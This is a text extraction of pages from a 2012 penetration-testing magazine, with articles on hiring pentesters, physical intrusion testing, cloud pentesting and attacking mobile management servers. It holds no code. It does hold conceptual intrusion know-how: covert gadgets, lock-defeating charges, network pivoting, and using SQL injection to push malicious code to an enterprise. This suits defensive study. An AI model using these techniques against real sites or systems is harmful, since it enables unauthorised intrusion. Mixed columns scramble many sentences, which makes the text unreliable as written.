be the most important. Now, what sorts of questions anything goes wrong.
should you be asking? I’m glad you asked; in no
particular order: How will the status of the test be provided?
This is basically a project management question, but it
How long have your individual team members can be very important. You’ll want to know the frequency
been performing penetration testing? of updates as well as if you’ll be contacted immediately
Please only include the team member(s) who will be if a horrible/highly critical vulnerability was found.
assigned to our account. This gives you an idea of the
experience level of the team members as well as boxes Are remediation services available?
the provider in to providing you experience levels of Some companies are simply not set up to help you
only the team members that will be testing your stuff. An with fixing up the holes they find. You have to decide
old industry trick is to bait and switch you by providing if this is important to you. My opinion is that it helps
your bios and experience of senior staff then assigning tremendously if a company can offer these services
very junior staff to do the actual testing. You want to try because it helps the overall testing process and the
to avoid this so try to work that into your RFP. reporting if real advice can be offered on how to fix the
problems found. Again, it’s a personal choice.
Has any current member of your team written
publicly about penetration testing or security in Will a re-test be included in the testing price?
general? Please list links to articles and/or blog Basically, will the company come back and re-test the
posts with dates things found to make sure they are properly fixed? I
I find this question to be the most revealing and in think this is becoming more the norm these days but it’s
running the business to which I am dedicated. If you worth checking on during the RFP phase.

THE BEST OF 01/2012 Page 14 http://pentestmag.com


Ask for a sample report
This will obviously give you a good view of the
final deliverable. The sample report should include
a response section so that you can comment on
vulnerabilities and provide feedback on the report. The
report phase should be collaborative and should not
exclude you as the customer. Often reports are done
in the dark and in a vacuum; there is no way you can
build a good report without taking into consideration
the business impact of the vulnerabilities and there
is no way to understand the business impact without
involving you.

References
I’ve always been torn on references. No one is going
to give you a bad reference. Of course you still want
to check them but I wouldn’t weight the references too
heavily. I’ve always wanted to ask a vendor for some
unfavorable references as well as good ones to give
me a balanced view. So far no one will give me any
bad references but I will keep you posted in case it
happens.
Penetration testing services can vary wildly from
provider to provider as with anything. Everyone has
a different definition and a different idea of what a
test should be. There is some work under way to
standardize the way things are reported and the way
tests are performed but not all providers are going to
follow those standards. You need to be careful about
who you hire because the right tester needs to have a
combination of technical, business, and communication
skills. You have to be able to trust that they will take
care with your production systems and not have them
come crashing down during the test. Can this always
be avoided? Of course not, but a good tester knows
how to take the necessary precautions. Asking the right
questions will get you that good tester and your life will
be better for it.

BILL MATHEWS
Bill Mathews is co-founder and
lead geek of Hurricane Labs,
an information security �rm
founded in 2004. He has been
in IT almost 20 years, in security
speci�cally for 13 of them, and
has been interested in security
since C3P0 told R2 to never
trust a strange computer. You
can reach Bill @billford and
@hurricanelabs on Twitter and
read other musings on http:// blog.hurricanelabs.com

THE BEST OF 01/2012


PENTEST REGULAR

Physical Goes First


On The Importance of Physical Pentesting (With Some
Practical Advice)

Physical pentesting is still dangerously neglected by enterprises.


With a top-notch digital protection they seem to forget that it will
all come to nothing if a physical security breach happens. Let’s try
to look into this problem.

I
magine yourself in those kind of action movies Modus operandi. It’s both a class for criminals and
such as 007, Mission Impossible, Die Hard, good guys alike. The same thing occurs with terrorist
Entrapment, Ocean’s eleven, to name a few, movies, they make real well-designed plans to break
where you are playing the role of the thief or a special into the target’s facility using social engineering and
agent either alone or most likely with the companion technologies that often times are more sophisticated
of a few (or a lot) other criminals planning to infiltrate than the ones implemented in the so called enemy or
a highly-protected facility where in 99.9% of times target. There are so many motivations that lead to this
you want to get in there to steal something very kind of crime, most of times is for profit but this is not the
valuable. In a few decades ago it would most likely scope of this article.
be something like gold bars, diamonds, money, a And speaking of the enemy, one inevitable question
masterpiece of art from some renowned artist or comes to my mind: do you know your enemy
any other kind of reliquary. In some cases still is (criminals)? Because it is most likely that he knows
but in today’s context, incredible as it may seem, you, and knows you very well. And in the event he
there are other things as much as valuable or even doesn’t, it can be a matter of time depending on
more valuable than the previous mentioned objects: how secure your organization is in terms of security
information. You can also recall of PC games like awareness and controls. That’s exactly for this very
Splinter Cell where you are a special agent always motive that the enemy is always one step ahead
breaking into physical security using your stealthy of you. It’s like a chess game where you only know
abilities (among other tech savvy ones), lock picking the concepts of the game and the enemy already
doors, using high tech gadgets to go undetected by mastered, so, logically he can defeat you easily,
the facility’s physical security. it’s that simple. And keeping on the simplistic side
It’s very similar the way it happens in a real world of things, keep in mind that everything in security,
scenario. Although there’s too much fantasy and lies in either logical or physical can be simplified into a tiny
these kind of movies and games, there’s also a lot of and simple word, risk. Obviously we only care about
pertinent things on how physical breaches occur and securing something because there’s the possibility of
most importantly, how bad guys act and what gadgets some unwanted event called risk happen. These risks
and technologies they use to circumvent the target’s turn out to being threats such as natural phenomena,
facility security and infiltrate it. You must know their human faults, insider threats, external threats, social

THE BEST OF 01/2012 Page 16 http://pentestmag.com


engineering, espionage, virus, frauds, etc. There are
3 simple triads in what methodology is concerned in
physical security: detection, protection and response,
gates, guns (or gadgets) and guards and another one

What’s the big deal if you have the best firewalls,


IDSes, IPSes, routers, servers, hardened operating
systems and applications and even state of the
art policies and procedures if one individual can
just walk into the data center and plug off all the
cables or steal your data without anyone knowing
it?
is: technology, people and process. Pentesting teams
should always have these concepts in mind when
conveying the scope of a penetration test to a client,
it’s often overlooked because I’ve come to places
where there was no methodology on how to conduct
the tests and also make of it an ongoing process.
Technical expertise is very important, but equally
important is the whole team’s understanding about
the processes and methodology or it will not succeed
on implementing an effective plan. It’s when Risk
Management (Risk = Threat x Vulnerability) comes
into play. It can be a risky process as unexpected
down time to the environment could cause negative
results. It is critical that the business continuity plans
(BCPs) and the disaster recovery plans (DRPs) have
been tested and verified before any penetration is
ever undertaken. The keyword is convergence, all the
pieces must fit one another in order to make all this
thing happen. We have to integrate technology and
people with physical security policies, it’s the perfect
match. It has the potential to save lives and assure
your business wealth, and reduce to a high degree
the risk level. It’s all about people and our – human?-
nature. There’s always one link that is always the
weakest and that link is people.
Generally, the physical pentest is conducted after
the software (or logical) test. From my point of view it
As important as making the test itself is to make
a detailed report on scope, success and failures,
issues, classified levels: minor, major, critical
where applicable.
should the other way round. Can anyone tell me what’s
the big deal if you have the best firewalls, IDSes,
IPSes, routers, servers, hardened operating systems
and applications and even state of the art policies and
procedures if one individual can just walk into the data
center and plug off all the cables or steal your data
without anyone knowing it? Logical security is nothing
without physical security. Bear in mind that all CSO’s
are responsible for physical security, I know many

THE BEST OF 01/2012


PENTEST REGULAR
of them who just don’t care as much as they should physical perimeter defense. If your enterprise doesn’t
about physical security. They only care about logical have budget, try to make a balance and see what is
perimeter security (e.g firewalls, IDSes, routers, most effective in your case oriented by a pentest team.
proxies, etc), it’s wrong! Can you tell me what are Oh, you don’t have budget to hire a pentest team, calm
your DMZ’s good for if I step into your servers room down, you may have IT security personnel, ask them for
and hack into you servers, routers and firewalls? Or advice on what are the best security implementations
format the HD’s 5 times in your whole server clusters for your company; if you don’t have any of these, you
inside the DMZ? Unless you have a good DR plan and can still buy some cheap and good cameras and buy a
quick recovery backup system I would have already dog or hire one guard. If you can’t afford that, you’re in
brought your business to the ground. Even if you have bad shape, but you can still pray.
a mirror site in another part of the city, or state or other
countries your company will not be running at its full Physical security assessments x Physical
capacity and the damage is done. Ok, so what? How security pentesting
are we going to protect our premises from a physical When performing physical security assessments of a
security perspective? What are the best practices? business we look for ways to tighten your business.
What are the countermeasures? What methodology Generally some questions should include, who has
should I use? What pentest teams should care about access to your building, servers room, office space,
and how should they perform the tests? Let’s try to laptops and PC’s and what time should they have
answer these and other questions that may arise this access granted, which parts of the building have
now. classified information and who has access to them?
To effectively make a security countermeasure you When was the last time you checked you fire, flood and
have to think like a hacker, cracker or any sort of criminal. smoke detectors? Are they operational and in correct
So, to protect your premises in a very effective manner locations? How easy would it be to get in your office
you have to apply the best in class access controls and and steal a piece of equipment? Do you have a security
system including motion sensors and alarms? Do you
Countermeasures have security cameras and are they properly configured
One of the best approaches to physical security in my and managed? Other universal questions, like the ones
humble opinion is what some enterprises have already made by Ken Stasiak, president of Secure State, are of
adopted and I like to call it Star, because It’s composed of 5 ultimate importance. You can check them following the
layers. Like any kind of security, a layered concept is always
the best choice as it eliminates single points of failure. The
following url: http://tinyurl.com/3fwhuxw.
respective layers are as follows: Don’t take anything for granted, make sure you have
Physical Security Layer – 1 – Perimeter – Blast walls and made all these questions (including the ones I made) and
gates, fencing, guards, radios, guns, etc. Uninterrupted all of them have been answered by the pen test team.
Power Supply and backup generators. As the name suggests, this is an assessment but
Physical Security Layer – 2 – The exterior walls and
should not lack in scope and methodology, and must
glasses – exterior door is reinforced, alarmed, use of
bulletproof glasses, access controlled and viewed by a be taken very seriously. Also, don’t forget the H.C.I.A
dedicated �xed camera, approach: human safety, confidentiality, integrity and
Physical Security Layer – 3- Inner walls – Man traps, It availability. These are the main objectives of physical
should be used in conjunction with security staff, video security.
surveillance, locks, seismic sensors, motion sensors,
sprinklers, �re and gas suppression, etc.
Physical Security Layer – 4 – Access controls – Guards, Strategies and tactics – make it harder for
cameras, sprinklers, intercoms and biometric readers, Access
Control requires that a 24/7 staffed Security Command
the criminals
center officer veri�es that the person standing in the mantrap • Do you remember the triple A of the logical security?
matches a �le photo. After con�rmation, the officer activates Authentication, authorization and accounting? Yes, it
the second proximity and biometric reader for use. must be used on physical security too.
Physical Security Layer – 5 – Compartmented spaces • Well de�ned security zones : external, internal,
(where the data center is located or other valuable and perimeter, restricted, secure and so on.
restricted area)- Every customer space, whether it is a cage, • Separate each zone with a barrier: door, locks, cameras,
cabinet or suite, is individually locked, protected, alarmed person, sensors, walls, fences, guards, etc.
and monitored. Additional security safeguards, such as • Use the concept of 3D security (�oor, walls and ceiling).
man-traps, intrusion sensors and surveillance cameras can Use �oor sensors, lasers, temperature sensors, alarms on
be added to these spaces at the customer’s request. the event of a roof breach.

THE BEST OF 01/2012 Page 18 http://pentestmag.com


Physical pentesting will be the action, so to speak, exposes potential vulnerabilities, identification/
of the previous assessment, remembering that there’s analysis of threat sources and yes, surely, should
no particular order in which it can be conducted. include social engineering. Must be a repeatable
You can make one and do not make the other, it all process and easy for the customer to understand,
depends of the customer’s scope and what they want always remember, that methodology is important.
to accomplish. But in my view, it doesn’t make sense, For example, you can try to define which
accomplishing one without the other. As we do in the methodology and scope you’ll use making questions
logical sphere when performing a pentest, we’ll try to like: can we survey the target, record the target,
do quite the same thing, just that this time it involves bypass controls and obstacles, alter controls, break
some other aspects. But the logic is the same, we’ll and destroy, introduce additional elements? Also
try to break into something and see if it can stop us define what are the main threats to the target in
or not and how secure it really is and what corrective question, and so forth. This will make things clearer
measures can be implemented. A physical penetration and help you define and mitigate the threats being
test also identifies the security weaknesses and evaluated. The best methodologies in use today
strengths of a company’s physical security. This is are ISECOM’s OSSTMM, NIST 800-12 and CPTED
why the penetration testers must be also trained in (another triad). Also as important as making the test
social engineering special attacks, and deception itself is to make a detailed report on scope, success
techniques, technology expertise and provide a fully and failures, issues, classified levels: minor, major,
documented test plan and work with the customer to critical where applicable. And again, you may be
find an acceptable level of exploitation, and define asked to explain your methods. Also, it must be a
rules of engagement for the operation. Questions real world scenario. When you evaluate, design, and
your team should make to your clients include: what’s implement an effective integrated physical security
the overall goal of the test?, What do we know about plan it doesn’t necessarily mean you have to use all
the customer? What or who is the target? (this is very the controls available nor all the security policies as
important because open ended tests lack purpose), well. Instead you shall define which is best for your
What type of testing should we perform: forced or company and if according to the company’s security
covert? Etc. A physical pentest have to determine: policies, the current solution fits your needs and you
potential attack vectors, evaluates the controls, are comfortable with the actual security level.

Phases of Penetration Testing: counter speaking devices (bluetooth, audio and video bugs, voice
changers), button camera kit, distant voice recorders, built-
intelligence in cell phone listening devices, unconventional lock picks
(do not forget the “get out of jail free card” or authorization (micro explosive-shaped charges deliver a quick impact to any
test letter). standard lock cylinder that will shatter the pins and unlock
the door) Night Vision Headset, Snake Cam (is essentially
Pre-Attack Phase
a �ber optic cable). Ultrasonic motion sensors, thermal
The two phases are passive and active reconnaissance.
motion Sensors, eavesdropping on VoIP, GPS tracker, noise
Passive reconnaissance – It should include the use of
generators.
blueprints of the target in question. Make satellite imagery:
Pen test life cycle: Perimeter Testing: Acquire Target: breaking
google earth, google maps, etc. War driving, Binoculars,
defenses: getting in: escalating privileges: cause damage:
Dumpster diving. Eavesdropping on employee conversations
leaving the place: mission complete.
using electronic devices or, researching the target through
Remember, the longer you remain on site during a physical
common Internet tools such as Who is, using tools to gather
penetration test, the greater your chances of discovery
information about people and companies such as Maltego.
and failure become. It is therefore absolutely essential you
Use tools like FOCA to gather information about the target’s
conclude your operation as quickly as possible once the
website.
physical element is initiated.
Active reconnaissance – probing the target- intercepting
communications en route using wi-� technologies systems, Post-Attack Phase- Penetration
impersonating people, social engineering, use of hich tech Testing deliverables, validation of penetration and �nal
gadgets, etc. report.
Attack Phase
Use the methodology and the tools you have chosen and start
the action.
Tools: Social engineering, laptops, handhelds, rogue access
points, fake badges, laser, microphones: T.A.K. (Tactical Audio
Kit). Camera Jammers , disposable pick , covert listening and

THE BEST OF 01/2012 Page 19 http://pentestmag.com


PENTEST REGULAR
when building up your security defenses. Protect your
Remember rubbish, secure your garbage (fence and a lock).
• Make a thorough security site survey with the
Shred the documents you no longer need. Make a
customer’s personnel of all levels of hierarchy to identify
areas that will host assets of sensitive nature. clean desk habit inside your organization. Lock your
• Security officers should patrol the facility 24x7x365 with information away when leaving desks unattended.
local police knowledge Lock your computer screen. Collect print jobs as soon
• It is mandatory for all employees and management as they are printed. Don’t write passwords on papers.
personnel (regardless of position and responsibility) Make people display their badges at all times inside
sign con�dentiality and nondisclosure agreements at
the time of joining. All physical security measures are the company. Never lend it and protect from loss and
enforced at all times. theft. Protect your access points (biometry, locks, etc)
• Indentify potential crime targets and take preventive and always close secure doors. Don’t hold doors open
measures. for those you don’t know. Visitors must sign in and use
• Check if all access controls are working and being a visitor badge. Restrict their access and accompany
properly managed
them at all times. Be careful with social engineering,
• Security officer and operators must verify if the CCTV is
working they have total visibility of what’s happening in don’t be fooled or manipulated by strangers. Identity
and out the facility in a 360o angle. must be verified of anyone requesting access to
a place. Immediately report suspicious activity or
people.
As with other security issues it is best to practice It’s true we cannot stop crime in its fullness in the
defense-in-depth which means to have multiple same manner we’ll not be able to handle the human
layers of protection. In other words, don’t depend on factor that is the only cause why we need so much
one protection as the entire defense strategy. There security implemented not only to prevent crimes
should be a control center which commands every but chaos as well, it holds true in all aspects of life,
aspect of the physical security with dedicated security including professional, but we can create, plan, design,
staff. implement and manage high-end security levels of
control to stop criminals and help to protect human
What do we have in our favor to stop the lives and businesses and their wealth. It’s a game of
criminals? Which tools are available? (Many) deception, but hopefully we’ll get things sorted out in
Hardware locks: conventional (lock and key), deadbolt the end.
(physical bolt), electronic (keyless), hybrid locks
(mechanical an electronic), token-based (magnetic
swipe card or proximity reader). Biometric, both EMERSON LIMA
physiological and behavioral such as eyeballs, iris, Sr. Systems engineer at Cray Inc.
retina, fingers, face and voice recognition, speed of Is a professional with solid experience in the area of
typing, etc, multi-factor (smart card, tokens and PIN’s). corporative networks, servers, operating systems and
Mantraps, video surveillance such as: CCTV (can applications (IT infra-structure) and telecom, with
replace physical guards in some cases), Continuous performance in small, medium and big companies, three of
video surveillance, fencing (barbed wire in the them being giant multi-national companies such as Unisys,
perimeter, best options are made of iron or stainless IBM and HP. Experience of 12 years in the area of networking,
steel and are very robust, will prevent people from operating systems and hardware and 8 years in the ethical
cutting and climbing. There are heavy-duty defenses hacking �eld, 5 years of project management and 16 years
for high security areas and installations such as crash- of overall experience in the IT �eld , dedicating himself to IT
rated bollards, crash-rated gates, wedge barriers, road security and ethical hacking in the last 5+ years including
blockers, tire killers, barrier lift systems and tracked cyber security and incident response, forensic investigations
gates (obviously these are mainly implemented in or other related aspects of security and network operations,
government and military sites’ facilities but there’s solid understanding of interconnected systems and the
nothing that impedes you from implementing it on potential exposures to vulnerabilities, large experience in
your data center surroundings). Vaults, number big datacenters, experience with SIEM or Log Management
plate recognition systems, sensors – infrared technologies and products. Experienced in IT compliance
motion, ultrasonic motion, photoelectric motion, standards and frameworks such as PCI DSS, SOX, ISO
electromechanical sensors such as door contacts, 27001. Firewalls, VPN, authentication, intrusion detection,
internal lock sensors and seismic sensors- these are malware detection, and vulnerability assessment and uni�ed
very important considerations you have to put in place communications technologies.

THE BEST OF 01/2012 Page 20 http://pentestmag.com



����������
�����

���������������������������������������������������������������������
������������������������������������������������������������������
���������������������������������������������������������������������
������������������������������������������������������������������
���������������������������

������������������������������������������������������������������
������������������������������������������������������������������
��������������������������������������������������������������
�������������������������������������������������������������������
��������������������������������������������������������������������
������������������������������������������������������

����������������������
�������������������������
�������������������
PENTEST REGULAR

Great Pen Test Coverage


Too Close For Missiles, Switching to Bullets

Tell me if this sounds familiar…you are asked to perform a


penetration test on customer network to determine the security
posture of their assets, and the first thing they do is give you a list
of assets that you are NOT allowed to test, because they are critical
systems to the business. Ironic isn’t it? This is exactly the difficulty
you can expect when performing penetration testing in the cloud,
but multiplied by ten.

T
here is a lot to think about and plan for when • Are we hiring a 3rd party company to perform the
you want to perform a penetration test in a cloud penetration tests for us?
service provider’s (CSP) network. Before we • Do we have our own penetration testing team?
get into the technical details, we need to start with the
basics. CSP in-house pen test team: If your cloud service
Questions to ask yourself: provider has their own penetration testers that is great
news! Not only does it show that they take security
• What does my contract and SLA state about seriously, but it means that you can leverage their
penetration testing? internal testing results for your own audits. If you do not
• Does the CSP already have a team of penetration have the money for your own penetration testing team
testers? And is this enough to meet your security (either in-house or 3rd party), you may be able to request
requirements or compliance objectives? detailed audit reports from the CSP relative to your

THE BEST OF 01/2012 Page 22 http://pentestmag.com


company. Have information disclosure policies built-in that they test for the OWASP Top 10 (https://
to your SLA, and monthly vulnerability reports delivered www.owasp.org/index.php/Category:OWASP_
to you. Some types of compliance will say this is not Top_Ten_Project) web application vulnerabilities.
enough and still require a 3rd party testing. Honestly, If they don’t have penetration testers, they should
you should perform your own penetration tests either at least be performing web application vulnerability
with your own team or by hiring a trusted and skilled 3rd scans using one of the several great tools out there
party. If your CSP claims that they are secure, are you they can setup in-house. Coincidentally, this type
just going to believe them? How do you know they didn’t of scanning can also be done from the cloud by
leave anything out of their reports? certain vendors as well.
Make sure you ask a lot of questions about what they • How did they test those things? Were the tests
tested & how: performed black box, white box, or grey box?
Vulnerability scans & fingerprinting are a precursor
• What was in scope? What devices, web apps, services, to the actual penetration testing. That being said,
databases, hosts, subnets, and network storage? Make you want to ensure that from the very beginning you
sure that any part of their Infrastructure (IaaS), Platform have an accurate vulnerability report by reducing the
(PaaS), or Software (SaaS) that is relevant to you is number of false positives discovered. The best way
included in the scope of testing and reports that are to do this is to use credentials (user + password). If
delivered to you. your vulnerability scanner says one of your servers
• For IaaS, you may want to see their architectural is running an unpatched, old version of Apache…
design and security review documents, security what is the best way to verify this? You login and see
policies and patch management policies, as well what version of Apache it is actually running. This is
as any hardening guides used. In addition you what white box testing does for you. It reduces the
should request vulnerability scans to be performed amount of unknowns in your testing. You don’t want
on your part of the VLAN or subnet. Other than any unknowns, because that is what will kill you.
providing you facilities with HVAC, physical Be warned you still MUST sort through any false-
security, and hazard positives, but the amount
controls – most of If you are going to hire outsiders, you will be you will have to deal with
the technical security playing the middleman, and working out a lot should be far less.
is your responsibility. of contract/SLA issues between all three parties • What tools were used?
Your job is to identify involved. If they used a vulnerability
what security gaps scanner, what scan policy
have not been filled by the CSP and fill them, or (what vulnerabilities) did they scan for? Top 10?
get the CSP to do it. Top 20? Make sure that anything you expect to
• For PaaS, in addition to everything listed above, be tested for is covered in their penetration tests
you should have your CSP verify that your & vulnerability scanning. If you are using a SaaS
platform is fully patched and up-to-date. Ensure product, you might want to know whether or not
that your installation of Apache, Ruby on Rails, their website enforces SSL encryption, or is being
Java, PHP, Bugzilla, Drupal, etc. is up-to-date and checked for code injection vulnerabilities such as
not running a default installation with default user Cross-site scripting (XSS) and SQL Injections.
names, passwords, and configuration files. If it is
not protected, it is your job as a PaaS tenant to 3rd party pen test team: If you are going to hire outsiders,
protect it. Some of these security responsibilities you will be playing the middleman, and working out a lot
will be shared by the CSP and yourself, so make of contract/SLA issues between all three parties involved.
sure you know where the line is drawn and who is You will have due diligence to perform when selecting
responsible for what through an SLA. your 3rd party pen test team. Many of the considerations
• For SaaS, security mostly depends on the CSP. suggested next should be used when hiring 3rd party pen
Make sure that in addition to everything listed above testers. You should ask the same questions and have
for IaaS & PaaS, that you get web application & similar requirements as listed above from the 3rd party
web service penetration testing done. Request pen test team just as one would with the CSP.
web application vulnerability reports, and make Your own pen test team: So you have a team and you
sure they have a web application security policy want to pen test your CSP. Great! Let’s get started. First,
that requires the CSP to test for vulnerabilities you should check your SLA and contractual agreement
on a regular basis. At a minimum, request between you and the CSP and then consider the type

THE BEST OF 01/2012 Page 23 http://pentestmag.com


PENTEST REGULAR
of cloud you will be testing, because each of them has service level agreement (SLA). You should know what
different consideration you must account for: application and technology you are running in your own
cloud since it was provided by your organization, and
• IaaS (Infrastructure as a Service) may not have to worry about multi-tenancy issues (but
• PaaS (Platform as a Service) you will for network & host level pen tests).
• SaaS (Software as a Service) You should be able to easily reach your web application/
services remotely for penetration testing. However, if
Next you Must Know the Scope of What you have deployed web application firewalls (WAF), or
you Want Tested to Meet your Security reverse proxy servers into your cloud it can interfere with
Requirements your penetration testing. For the most accurate results,
it is recommended to pen test against these web apps/
• Web application pen test (this includes mobile services without your WAF or reverse proxy in front of
apps) you. The reason is simple… you want to know what
• Web service pen test (this includes mobile back- vulnerabilities actually exist so that you can fix them.
end services) WAFs are not replacements for secure coding practices.
• Network/host pen test (this includes databases, You wouldn’t run an un-patched OS on the web with only
firewalls, and other systems in your cloud network) a firewall, and expect it to be “secured” would you? Testing
with these types of mechanisms in place give you a false
IaaS/PaaS web apps & web services: The good sense of security by hiding what really exists. However,
news is that IaaS cloud grants the customer the most you may actually want to test with your IPS, WAF, and
granular control over the entire environment. That other security devices in place; this will can also give you
means most of security built-in will have to be setup another valuable point-of-view. You just need to decide: Is
by your organization, and you should have an easier the goal to test how well your devices are configured and
time planning how to properly conduct your test with operating? Is the goal to test the CSP’s security team, and
the given architecture. Since it is up to you to supply how well attacks detected on their network? An exercise
the web application and web services, you will have can be coordinated with the CSP’s security team, by
an easier time testing for vulnerabilities and performing which a live penetration test is conducted to test the
penetration tests. Since security is left to the cloud responsiveness and effectiveness of their security team.
user’s responsibilities, you usually will not have to You should opt to perform authenticated pen tests
interact too much with the CSP to perform your own against web apps and services, and authenticated
penetration tests on your own system as part of your vulnerability scans against hosts. You will be able to get
cloud security program. You should state upfront in more accurate test coverage of your cloud.
your CSP contract that you will be performing your own Iaas/PaaS network & hosts: If you want to pen test
penetration tests, and what that scope is going to be, your cloud network meticulously, you should perform
and how often. This ideally should have been planned internal and external pen tests. This will provide you
early on the in contract, not after the fact. If you are with two dissimilar points of view, and likely different set
lucky, the CSP has already put this language into their of vulnerability results.

������������������������������
�������������� �������� ��������
����������� ������������ ������������ ������������
����������

����������� ����������� ����������� �����������


����������

���� ���� ���� ����

������� ������� ������� �������


�������������
����������

���������� ���������� ���������� ����������


�������������

��� ��� ��� ���

�������������� �������������� �������������� ��������������


�������������

������� ������� ������� �������

������� ������� ������� �������

���������� ���������� ���������� ����������

Figure 1. Separation of responsibilities

THE BEST OF 01/2012 Page 24 http://pentestmag.com


* A “pivot” It may be possible in your IaaS/PaaS
…is when a hacker breaks into a computer and uses that
computer to hack into another. This has a few advantages:
environment that multi-tenancy exists
If this condition exists, you may not be allowed to perform
1) It disguises the hackers true origins authenticated tests, or any test for that matter against certain
2) It allows a hacker to attack other targets from the point- systems (due to the impact it can have against other CSP
of-view of the victim (i.e. inside the �rewall). customers). You will have to work with your CSP to determine
what is allowed and what is not, which should all documented
If the attacker couldn’t port scan you before, he can now! in your contractual agreement and SLA. Your goal should still
The best type of pivot is a VPN pivot. The hacker sets up a se- be as much testing coverage as possible within legal bounds.
cure VPN connection between the compromised host inside
that those are hosted on. Make sure you perform
your network and the outside world, effectively giving him a
backdoor into your corporate network. authenticated penetration tests for the best coverage.
What you should take away from this is that penetration
To conduct an internal pen test, you should already testing in the cloud takes a large amount of coordination
have access to all your servers and hosts in the cloud and contract negotiations before the fun stuff can begin.
(including the databases and storage components). Before you negotiate the terms of penetration testing in
You should also have access control credentials and your contract, you have homework to do. Know what kind
network architecture. Start with an authenticated of penetration testing you want to perform. For areas that
vulnerability scan against your systems. The idea you are not able to test, make sure you take note of
behind an internal assessment is that you want to where security gaps may exist, and check to make sure
know what kind of damage you have compensating
a hacker (or disgruntled Penetration testing in the cloud takes a large controls in place to mitigate
employee) can do, if he/ amount of coordination and contract negotiations the risk. For example, if
she had access inside the before the fun stuff can begin. you are unable to perform
perimeter. This will also penetration tests against a
help discover potential pivot* points used by hackers. database, ask the user CSP to provide design details,
For an external and more realistic viewpoint of an sanitized device configuration files, the hardening guide
average hacker, you will want to test remotely from lines used, results from the CSP’s own penetration tests,
outside the DMZ. This should be performed as any and any other relevant audit reports. You have less
typical black box remote penetration test. External control over the cloud environment than with your own
white box testing here is not really necessary if you are network, so try to maintain as much of that control as
already performing internal white box pen tests. possible through contractual agreements and SLAs.
SaaS pen testing in general: It is up to the CSP to
provide all the security to the customer in this cloud
environment. That includes host level security all the AARON BRYSON
way up to web application security. Performing internal Aaron is a Senior Information Security
and external pen tests of any type will usually require Engineer & Risk Management Specialist
very difficult contract negotiations, because of multi- at Cisco’s Corporate Security Programs
tenancy. It very common that SaaS products share Office (CSPO), on the Infosec Risk & Audit
backend components (e.g. databases and storage), team. Aaron’s history at Cisco began
and as such certain vulnerability tests (e.g. DoS and with the Intrusion Detection/Prevention
SQL injection) may not be permitted. System team (IDS/IPS product). After a couple years he moved
Since you will have very little access beyond the to the consulting arm of Cisco as a penetration tester where his
public facing web application(s) & web service(s), you clients included many Fortune 500 companies & government
don’t have many options for network pen tests. To get entities in every vertical. Eventually, he moved his skills in-
this done in a SaaS environment, it will require very house to the Infosec team to create Cisco’s own internal
special permission and you will have to take what you application security penetration testing program to secure
can get. Remember that your objective is still to get as the companies’ few thousand applications, as well as a Red
much test coverage as possible. So try to push for an Team. Primary responsibilities now include developing and
internal pen test on their network as much as possible performing penetration test programs for Cisco’s products,
through documented mutual agreement. However, most web applications and services, and network on a global scale.
likely you will only get permission to pen test the web Clients include Cisco-on-Cisco, partners, acquisitions, and
app and web service itself, and maybe the web servers customers. http://www.linkedin.com/in/aabryson

THE BEST OF 01/2012 Page 25 http://pentestmag.com


PENTEST REGULAR

Attacking the Mobile


Infrastructure
We will explore a few philosophies for attacking a mobile
management infrastructure. The article will cover the differences
in testing mobile stuff vs “everything else” as well as reusing some
of the things you know to demystify the mobile world.

I
would like to point out that I am by no means an Mobile smart phones and tablets do have a few key
expert in mobile devices or their management differences that I wanted to outline:
infrastructures. This article was as much a learning
experience for me as a writing project. I chose, • They are by and large single user systems with root
deliberately to not make this a terribly technical article or admin restricted by default
and more of a how to approach this article because I • They run specialized operating systems but rely
think sometimes in our industry we get hopelessly lost heavily on web interactions
in the this will be so cool that we forget the this is the • Often they aren’t controlled or managed by IT,
right, practical approach. Hope you enjoy. users bring in their personal phones for business
As penetration testers we often times get mired in use (we’re not focusing on these)
trying to craft attacks and finding 0-days when we should • Tablets (well the iPad anyway) are quickly
be fixating on our jobs, that is to provide an assessment becoming a great way to work from conference
of the security posture of a given system with practical rooms, meetings, etc. They are really a hybrid
scenarios. Though I see the between smart phone and a
value in crafting new attacks, As penetration testers we often times get mired laptop.
I’m not sure it’s the job of a in trying to craft attacks and finding 0-days
traditional penetration tester when we should be fixating on our jobs, that is to Now before we dig too much
but that’s another article. It’s provide an assessment of the security posture of a deeper I want to say that I’m
hard enough to resist that given system with practical scenarios. not going to focus too much
temptation when dealing with on attacking the phones/
web applications and Windows systems that have been tablets themselves, there is quite a bit of research
around forever and are pretty well understood but throw and work being done in those areas already and I
in something new and our geek buzzers start buzzing doubt I could add much to it. I have always taken
overtime. Whenever we’re asked to test some new a more practical approach to penetration testing
thing, in this case a mobile infrastructure, out come the (right or wrong), I start with the simplest, widest
compilers and debuggers. We should start by asking reaching techniques first then move out to the more
ourselves the most boring question possible, is this stuff difficult methods of attack. I’m not discounting direct
really THAT different than what we’re used to? phone attacks I just find them to be more of a pain

THE BEST OF 01/2012 Page 26 http://pentestmag.com


than they’re worth. First you have to find a phone to secret. Developers, administrators and IT management
target which is usually on a person, hope they have do not take management interfaces terribly seriously. If
it on and then hope it’s vulnerable to something it’s an inside the firewall test you are nearly guaranteed
you’re prepared before. It’s pretty difficult to craft an to find a few open admin interfaces typically with default
attack in just a few seconds as the target is walking credentials. Of course I’m certain this won’t happen
by. I digress, the real gold is in the management with anything as important as a mobile management
infrastructure of these devices (where it exists) infrastructure but just in case let’s continue our attack
because most likely it contains all the information in on the front.
the phone anyway. It’s also probably a much easier Theoretically every web application that interfaces
and more practical target. with a database has a SQL Injection (SQLi)
I’m also not going to focus on any one management vulnerability of some sort. Bold statement? Not really,
infrastructure as I would like to keep it generic enough just based on years of experience, I’ve met very few
to apply to as many as possible. As I looked at these with no exploitable vulnerability. Fast forwarding
various management tools most of them seemed to though let’s say our management infrastructure has
have a few things in common. First, they’re almost a SQLi vulnerability and we can insert records, let’s
all web based with a database backend, does that look at all we can do with that. First and foremost
sound new, exciting or cutting edge? I hope not. That’s we can probably enroll our own phone and figure out
right though, most of these cutting edge, high end what the management infrastructure does to a phone.
management infrastructures are simple web apps. Second we will be able to push our own malicious
Do we need to break out our compilers and start code to the entire enterprise. From a penetration
composing custom attacks yet? Probably not. Let’s testing perspective it’s not going to get much better
look at a few ways to approach the problem, without than that. Fortunately I’m sure all of these various
doing anything crazy. infrastructures have undergone many rounds of
security testing and hence it just won’t be this easy.
Attacking the Front Moving on.
Now that we have determined most of these are
basically web apps let’s look at where we can hit this Attacking the Middle
infrastructure the hardest, the management interface. A few things I noticed while taking my tour of the
If you have either been a penetration tester or a web various management suites (aside from how cute all
